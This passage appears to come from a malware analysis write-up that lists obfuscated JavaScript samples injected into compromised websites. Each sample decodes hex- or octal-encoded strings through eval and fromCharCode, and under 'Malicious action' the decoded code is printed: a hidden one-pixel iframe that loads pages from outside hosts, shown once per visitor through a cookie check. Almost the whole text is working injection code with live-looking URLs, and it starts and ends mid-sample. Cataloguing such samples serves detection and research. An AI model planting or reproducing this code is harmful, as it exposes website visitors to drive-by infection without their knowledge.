977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";
  7. = [];
  8. for (= 0; i < a.length; i += 2) {
  9.     z.push(parseInt(a.substr(i, 2), 16) - 14);
  10. }
  11. eval(ss["fr" + "omCharCode"].apply(ss, z));

Malicious action: injecting hidden iframe to http://de-verzend-service.nl/3xzqrG8t.php

  1. function zzzfff() {
  2.     var swpm = document.createElement('iframe');
  3.     swpm.src = 'http://de-verzend-service.nl/3xzqrG8t.php';
  4.     swpm.style.position = 'absolute';
  5.     swpm.style.border = '0';
  6.     swpm.style.height = '9px';
  7.     swpm.style.width = '7px';
  8.     swpm.style.left = '1px';
  9.     swpm.style.top = '1px';
  10.     if (!document.getElementById('swpm')) {
  11.         document.write('<div id=\'swpm\'></div>');
  12.         document.getElementById('swpm').appendChild(swpm);
  13.     }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  21. }
  22. function GetCookie(name) {
  23.     var start = document.cookie.indexOf(name + "=");
  24.     var len = start + name.length + 1;
  25.     if ((!start) &&
  26.         (name != document.cookie.substring(0, name.length))) {
  27.         return null;
  28.     }
  29.     if (start == -1) return null;
  30.     var end = document.cookie.indexOf(";", len);
  31.     if (end == -1) end = document.cookie.length;
  32.     return unescape(document.cookie.substring(len, end));
  33. }
  34. if (navigator.cookieEnabled) {
  35.     if (GetCookie('visited_uq') == 55) {} else {
  36.         SetCookie('visited_uq', '55', '1', '/');
  37.         zzzfff();
  38.     }
  39. }


Sample 5

  1. var wsqWQBPps ="cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2fcNRoPJdqz76cNRoPJdqz6ccNRoPJdqz71cNRoPJdqz73cNRoPJdqz72cNRoPJdqz79cNRoPJdqz79cNRoPJdqz61cNRoPJdqz63cNRoPJdqz72cNRoPJdqz2ecNRoPJdqz70cNRoPJdqz68cNRoPJdqz70cNRoPJdqz3fcNRoPJdqz76cNRoPJdqz61cNRoPJdqz6fcNRoPJdqz77cNRoPJdqz76cNRoPJdqz3dcNRoPJdqz4ecNRoPJdqz48cNRoPJdqz63cNRoPJdqz43cNRoPJdqz71cNRoPJdqz55cNRoPJdqz46cNRoPJdqz53cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz68cNRoPJdqz72cNRoPJdqz79cNRoPJdqz74cNRoPJdqz65cNRoPJdqz77cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz39cNRoPJdqz38cNRoPJdqz38cNRoPJdqz39cNRoPJdqz34cNRoPJdqz33cNRoPJdqz39cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz79cNRoPJdqz6acNRoPJdqz72cNRoPJdqz65cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz38cNRoPJdqz35cNRoPJdqz34cNRoPJdqz22cNRoPJdqz20cNRoPJdqz6ecNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz79cNRoPJdqz66cNRoPJdqz65cNRoPJdqz6acNRoPJdqz43cNRoPJdqz50cNRoPJdqz43cNRoPJdqz7acNRoPJdqz62cNRoPJdqz41cNRoPJdqz22cNRoPJdqz20cNRoPJdqz74cNRoPJdqz69cNRoPJdqz74cNRoPJdqz6ccNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz4ecNRoPJdqz65cNRoPJdqz73cNRoPJdqz58cNRoPJdqz6fcNRoPJdqz59cNRoPJdqz47cNRoPJdqz54cNRoPJdqz42cNRoPJdqz7acNRoPJdqz22cNRoPJdqz20cNRoPJdqz77cNRoPJdqz69cNRoPJdqz64cNRoPJdqz74cNRoPJdqz68cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz68cNRoPJdqz65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e";
  2.  yvDFQwwmM = eval;
  3.  var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%");
  4.  yvDFQwwmM("document.write(unescape(WSxQJgvuB))");


Malicious action:  injecting hidden iframe to http://private3[.]zapto[.]org

  1. <iframe src="http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854"
  2.         name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0">
  3. </iframe>


Sample 6

  1. try {
  2.     if (window.document)--document.getElementById('12')
  3. } catch (qq) {
  4.     if (qq != null) ss = eval("St" + "ring");
  5. }
  6. ="2e74837c7182777d7c2e88888874747436372e891b182e846f802e877d73732e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e877d73733c8180712e4b2e357682827e483d3d8585853c736f757a7381837c81878182737b3c717d7b3d847772737d3d79467276595f56803c7e767e35491b182e877d73733c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e877d73733c8182877a733c707d807273802e4b2e353e35491b182e877d73733c8182877a733c7673777576822e4b2e353f7e8635491b182e877d73733c8182877a733c85777282762e4b2e353f7e8635491b182e877d73733c8182877a733c7a7374822e4b2e353f7e8635491b182e877d73733c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635877d73733537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35877d73736a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c82508757723635877d737335373c6f7e7e737c725176777a7236877d737337491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";
  7. = [];
  8. for (= 0; i < a.length; i += 2) {
  9.     z.push(parseInt(a.substr(i, 2), 16) - 14);
  10. }
  11. eval(ss["fr" + "omCharCode"].apply(ss, z));

Malicious action:  injecting hidden iframe to http://www.eaglesunsystem.com/video/k8dhKQHr.php

  1. function zzzfff() {
  2.     var yoee = document.createElement('iframe');
  3.     yoee.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php';
  4.     yoee.style.position = 'absolute';
  5.     yoee.style.border = '0';
  6.     yoee.style.height = '1px';
  7.     yoee.style.width = '1px';
  8.     yoee.style.left = '1px';
  9.     yoee.style.top = '1px';
  10.     if (!document.getElementById('yoee')) {
  11.         document.write('<div id=\'yoee\'></div>');
  12.         document.getElementById('yoee').appendChild(yoee);
  13.     }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  36. if (navigator.cookieEnabled)
  37. {
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }


Sample 7

  1. ps = "s" + "p" + "l" + "i" + "t";
  2. asd = function () {
  3.     ++d.body
  4. };
  5. =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,163,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,163,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,167,154,173,154,171,65,165,154,160,172,157,65,165,154,173,66,176,167,64,152,166,165,173,154,165,173,66,167,163,174,156,160,165,172,66,152,174,172,173,166,164,160,201,154,64,150,153,164,160,165,66,70,167,131,176,140,126,100,136,65,167,157,167,56,102,24,21,47,163,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,163,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,163,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,163,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,163,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,163,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,163,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
  6. = document;
  7. for (= 0; i < a.length; i += 1) {
  8.     a[i] = -(10 - 3) + parseInt(a[i], 8);
  9. }
  10. try {
  11.     asd()
  12. } catch (q) {
  13.     yy = 50 - 50;
  14. }
  15. try {
  16.     yy /= 2
  17. } catch (q) {
  18.     yy = 1;
  19. }
  20. if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));

Malicious action:  injecting hidden iframe to http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php

  1. function zzzfff() {
  2.     var l = document.createElement('iframe');
  3.     l.src = 'http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php';
  4.     l.style.position = 'absolute';
  5.     l.style.border = '0';
  6.     l.style.height = '1px';
  7.     l.style.width = '1px';
  8.     l.style.left = '1px';
  9.     l.style.top = '1px';
  10.     if (!document.getElementById('l')) {
  11.         document.write('<div id=\'l\'></div>');
  12.         document.getElementById('l').appendChild(l);
  13.     }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  36. if (navigator.cookieEnabled)
  37. {
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }

Sample 8

  1. ps = "split";
  2. = eval;
  3. = "0x";
  4. = 0;
  5. = "y";
  6. try {
  7.     a *= 25
  8. } catch (zz) {
  9.     a = 1
  10. }
  11. if (!a) {
  12.     try {
  13.         --e("doc" + "ument")["\x62od" + z]
  14.     } catch (q) {
  15.         a2 = "_";
  16.         sa = 0xa - 02;
  17.     }
  18.     z ="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_77_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2f_38_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_70_6d_71_6f_70_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_7f_71_6c_7c_70_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_74_6d_6e_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_7c_77_78_28_45_28_2f_39_78_80_2f_43_15_12_15_12_28_71_6e_28_30_29_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7f_7e_7b_6d_78_2f_31_31_28_83_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_7f_7a_71_7c_6d_30_2f_44_6c_71_7e_28_71_6c_45_64_2f_7f_7e_7b_6d_78_64_2f_46_44_37_6c_71_7e_46_2f_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7f_7e_7b_6d_78_2f_31_36_69_78_78_6d_76_6c_4b_70_71_74_6c_30_7f_7e_7b_6d_78_31_43_15_12_28_85_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_5b_6d_7c_4b_77_77_73_71_6d_30_6b_77_77_73_71_6d_56_69_75_6d_34_6b_77_77_73_71_6d_5e_69_74_7d_6d_34_76_4c_69_81_7b_34_78_69_7c_70_31_28_83_15_12_28_7e_69_7a_28_7c_77_6c_69_81_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_7e_69_7a_28_6d_80_78_71_7a_6d_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_71_6e_28_30_76_4c_69_81_7b_45_45_76_7d_74_74_28_84_84_28_76_4c_69_81_7b_45_45_38_31_28_76_4c_69_81_7b_45_39_43_15_12_28_6d_80_78_71_7a_6d_36_7b_6d_7c_5c_71_75_6d_30_7c_77_6c_69_81_36_6f_6d_7c_5c_71_75_6d_30_31_28_33_28_3b_3e_38_38_38_38_38_32_3a_3c_32_76_4c_69_81_7b_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_28_45_28_6b_77_77_73_71_6d_56_69_75_6d_33_2a_45_2a_33_6d_7b_6b_69_78_6d_30_6b_77_77_73_71_6d_5e_69_74_7d_6d_31_15_12_28_33_28_2a_43_6d_80_78_71_7a_6d_7b_45_2a_28_33_28_6d_80_78_71_7a_6d_36_7c_77_4f_55_5c_5b_7c_7a_71_76_6f_30_31_28_33_28_30_30_78_69_7c_70_31_28_47_28_2a_43_28_78_69_7c_70_45_2a_28_33_28_78_69_7c_70_28_42_28_2a_2a_31_43_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_4f_6d_7c_4b_77_77_73_71_6d_30_28_76_69_75_6d_28_31_28_83_15_12_28_7e_69_7a_28_7b_7c_69_7a_7c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_76_69_75_6d_28_33_28_2a_45_2a_28_31_43_15_12_28_7e_69_7a_28_74_6d_76_28_45_28_7b_7c_69_7a_7c_28_33_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_33_28_39_43_15_12_28_71_6e_28_30_28_30_28_29_7b_7c_69_7a_7c_28_31_28_2e_2e_15_12_28_30_28_76_69_75_6d_28_29_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_38_34_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_31_28_31_28_31_15_12_28_83_15_12_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_85_15_12_28_71_6e_28_30_28_7b_7c_69_7a_7c_28_45_45_28_35_39_28_31_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_7e_69_7a_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_2a_43_2a_34_28_74_6d_76_28_31_43_15_12_28_71_6e_28_30_28_6d_76_6c_28_45_45_28_35_39_28_31_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_74_6d_76_6f_7c_70_43_15_12_28_7a_6d_7c_7d_7a_76_28_7d_76_6d_7b_6b_69_78_6d_30_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_74_6d_76_34_28_6d_76_6c_28_31_28_31_43_15_12_85_15_12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);
  19.     za = "";
  20.     for (= 0; i < z.length; i++) {
  21.         za += String["fromCharCode"](e(+ (z[i])) - sa);
  22.     }
  23.     zaz = za;
  24.     e(zaz);
  25. }

Malicious action:  injecting hidden iframe to http://vasnetworker.com/cnt.php

  1. function zzzfff() {
  2.     var wvsep = document.createElement('iframe');
  3.     wvsep.src = 'http://vasnetworker.com/cnt.php';
  4.     wvsep.style.position = 'absolute';
  5.     wvsep.style.border = '0';
  6.     wvsep.style.height = '1px';
  7.     wvsep.style.width = '1px';
  8.     wvsep.style.left = '1px';
  9.     wvsep.style.top = '1px';
  10.     if (!document.getElementById('wvsep')) {
  11.         document.write('<div id=\'wvsep\'></div>');
  12.         document.getElementById('wvsep').appendChild(wvsep);
  13.     }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  36. if (navigator.cookieEnabled)
  37. {
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }


Sample 9

  1. eval(String.fromCharCode(107, 49, 61, 34, 107, 101, 108, 108, 121, 43, 98, 108, 117, 101, 43, 98, 111, 111, 107,34, 59, 114, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 114, 101, 102, 101, 114, 114, 101, 114, 59, 117, 61,100, 111, 99, 117, 109, 101, 110, 116, 46, 85, 82, 76, 59, 116, 61, 34, 34, 59, 115, 101, 61, 34, 117, 110, 107,110, 111, 119, 110, 34, 59, 32, 13, 10, 102, 117, 110, 99, 116, 105, 111, 110, 32, 97, 40, 99, 44, 100, 44, 101,41, 123, 105, 102, 40, 114, 46, 105, 110, 100, 101, 120, 79, 102, 40, 99, 41, 33, 61, 45, 49, 41, 123, 116, 61,100, 59, 115, 101, 61, 101, 59, 125, 125, 32, 13, 10, 97, 40, 34, 103, 111, 111, 103, 108, 101, 46, 34, 44, 34,113, 34, 44, 34, 103, 111, 111, 103, 108, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 109, 115, 110, 46, 34, 44, 34,113, 34, 44, 34, 109, 115, 110, 34, 41, 59, 32, 13, 10, 97, 40, 34, 121, 97, 104, 111, 111, 46, 34, 44, 34, 112,34, 44, 34, 121, 97, 104, 111, 111, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97, 108, 116, 97, 118, 105, 115, 116, 97,46, 34, 44, 34, 113, 34, 44, 34, 97, 108, 116, 97, 118, 105, 115, 116, 97, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97,111, 108, 46, 34, 44, 34, 113, 117, 101, 114, 121, 34, 44, 34, 97, 111, 108, 34, 41, 59, 32, 13, 10, 97, 40, 34,97, 115, 107, 46, 34, 44, 34, 113, 34, 44, 34, 97, 115, 107, 34, 41, 59, 32, 13, 10, 97, 40, 34, 101, 117, 114,101, 107, 97, 46, 99, 111, 109, 46, 34, 44, 34, 113, 34, 44, 34, 101, 117, 114, 101, 107, 97, 46, 99, 111, 109,34, 41, 59, 32, 13, 10, 97, 40, 34, 108, 121, 99, 111, 115, 46, 99, 111, 109, 46, 34, 44, 34, 113, 117, 101, 114,121, 34, 44, 34, 108, 121, 99, 111, 115, 34, 41, 59, 32, 13, 10, 97, 40, 34, 104, 111, 116, 98, 111, 116, 46, 99,111, 109, 46, 34, 44, 34, 77, 84, 34, 44, 34, 104, 111, 116, 98, 111, 116, 34, 41, 59, 32, 13, 10, 97, 40, 34,105, 110, 102, 111, 115, 101, 101, 107, 46, 99, 111, 109, 46, 34, 44, 34, 113, 116, 34, 44, 34, 105, 110, 102,111, 115, 101, 101, 107, 46, 99, 111, 109, 34, 41, 59, 32, 13, 